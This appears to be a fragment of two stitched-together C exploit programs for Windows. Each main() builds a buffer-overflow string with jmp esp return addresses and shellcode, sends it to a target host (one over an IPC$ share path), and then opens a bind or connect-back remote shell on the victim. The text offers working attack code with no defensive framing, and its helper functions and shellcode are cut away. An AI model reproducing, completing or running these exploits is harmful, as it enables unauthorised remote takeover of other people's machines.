int main(int argc, char *argv[]) {
char opt;
char *host, *ptr, *ip="";
struct sockaddr_in sockadd;
int i, i_len, ok=0, mode=0, flag=0;
int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;
int target=TARGET, scsize=SC_SIZE_1, port=PORT;
int timeout=TIME_OUT, interval=INTERVAL;
long retaddr;
WSADATA wsd;
SOCKET s1, s2;
if (argc<2) { usage(argv[0]); }
while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) {
switch(opt) {
case 'a':
align=atoi(optarg);
break;
case 'I':
interval=atoi(optarg);
break;
case 'T':
timeout=atoi(optarg);
break;
case 't':
target=atoi(optarg);
retaddr=targets[target-1].jmpesp;
break;
case 'i':
ip=optarg;
changeip(ip);
break;
case 'l':
mode=1;
scsize=SC_SIZE_2;
break;
case 'r':
retsize=atoi(optarg);
break;
case 's':
sc_offset=atoi(optarg);
break;
case 'h':
ok=1;
host=optarg;
sockadd.sin_addr.s_addr=inet_addr(optarg);
break;
case 'p':
port=atoi(optarg);
break;
case 'H':
showtargets();
break;
default:
usage(argv[0]);
break;
}
}
if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); }
memset(buff,NOP,BSIZE);
ptr=buff+align;
for(i=0;i<retsize;i+=4) {
*((long *)ptr)=retaddr;
ptr+=4;
}
if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {
err_exit("-> WSAStartup error....");
}
if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
err_exit("-> socket() error...");
}
sockadd.sin_family=AF_INET;
sockadd.sin_port=htons((SHORT)port);
ptr=buff+retsize+sc_offset;
if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'..");
banner();
if (mode) {
printf("-> 'Listening' mode...( port: %d )\n",port);
changeport(connback, port, PORT_OFFSET_2);
for(i=0;i<scsize;i++) { *ptr++=connback[i]; }
do_send(host,timeout);
Sleep(1000);
sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
i_len=sizeof(sockadd);
if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {
err_exit("-> bind() error");
}
if (listen(s1,0)<0) {
err_exit("-> listen() error");
}
printf("-> Waiting for connection...\n");
s2=accept(s1,(struct sockaddr *)&sockadd,&i_len);
if (s2<0) {
err_exit("-> accept() error");
}
printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr));
resetalarm();
doshell(s2);
}
else {
printf("-> 'Connecting' mode...\n",port);
changeport(bindport, port, PORT_OFFSET_1);
for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }
do_send(host,timeout);
Sleep(1000);
printf("-> Will try connecting to shell now....\n");
i=0;
while(!flag) {
Sleep(interval*1000);
if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
printf("-> Trial #%d....\n",i++);
}
else { flag=1; }
}
printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port);
resetalarm();
doshell(s1);
}
return 0;
}
// ***************************************************************
int main(int argc,char *argv[])
{
WSADATA wsdata;
int sock;
unsigned short port = 9191;
struct sockaddr_in target;
unsigned long ip;
char opt;
int tgt_type = 0;
char *tgt_host;
if (argc<2) { usage(argv[0]); }
while((opt = getopt(argc,argv,"h:t:v"))!=EOF) {
switch(opt)
{
case 'h':
tgt_host = optarg;
snprintf(tgt_net,127, "\\\\%s", optarg);
snprintf(ipc,127, "\\\\%s\\ipc$", optarg);
break;
case 't':
tgt_type = atoi(optarg);
if (tgt_type == 0 || tgt_type > sizeof(targets) / 8) {
showtargets();
}
break;
default:
usage(argv[0]);
break;
}
}
printf("\n[+] Prepare exploit string\n");
memset(expl, 0x00, sizeof(expl));
memset(expl, 0x41, 2064);
memcpy(&expl[2044], (unsigned char *) &targets[tgt_type-1].jmpesp, 4);
//memcpy(&expl[2044], "BBBB", 4);
memcpy(&expl[2064], shellcode, sizeof(shellcode)); // begin shellcode here
memset(expl_uni, 0x00, sizeof(expl_uni));
memset(tgt_net_uni, 0x00, sizeof(tgt_net_uni));
mbstowcs(tgt_net_uni, tgt_net, sizeof(tgt_net));
switch(tgt_type) {
case 1:
case 3:
MultiByteToWideChar(CP_ACP, 0, expl, sizeof(expl), (unsigned short *)expl_uni,sizeof(expl_uni));
// MultiByteToWideChar - 100 % work at XP+SP0+Rollup
break;
case 2:
mbstowcs(expl_uni, expl, sizeof(expl)); // work at XP+SP1
break;
default:
mbstowcs(expl_uni, expl, sizeof(expl));
break;
}
beginthread(send_exp,0,NULL);
printf("[+] Sleep at 2s ... \n");
sleep(2000);
if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) {
printf("[x] WSAStartup error...\n");
WSACleanup();
return 1;
}
printf("[+] Initialize WSAStartup - OK\n");
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
printf("[*] Socket initialized - OK\n");
ip=gimmeip(tgt_host);
memset(&target, 0, sizeof(target));
target.sin_family=AF_INET;
target.sin_addr.s_addr = ip;
target.sin_port=htons(port);
printf("[+] Try connecting to %s:%d ...\n",tgt_host,port);
if(connect(sock,(struct sockaddr *)&target, sizeof(target))!=0) {
printf("\n[x] Exploit failed or is Filtred. Exiting...\n");
WSACleanup();
exit(1);
}
printf("[*] Connected to shell at %s:%d\n\n",inet_ntoa(target.sin_addr),port);
cmdshell2(sock);
closesocket(sock);
WSACleanup();
return 0;
}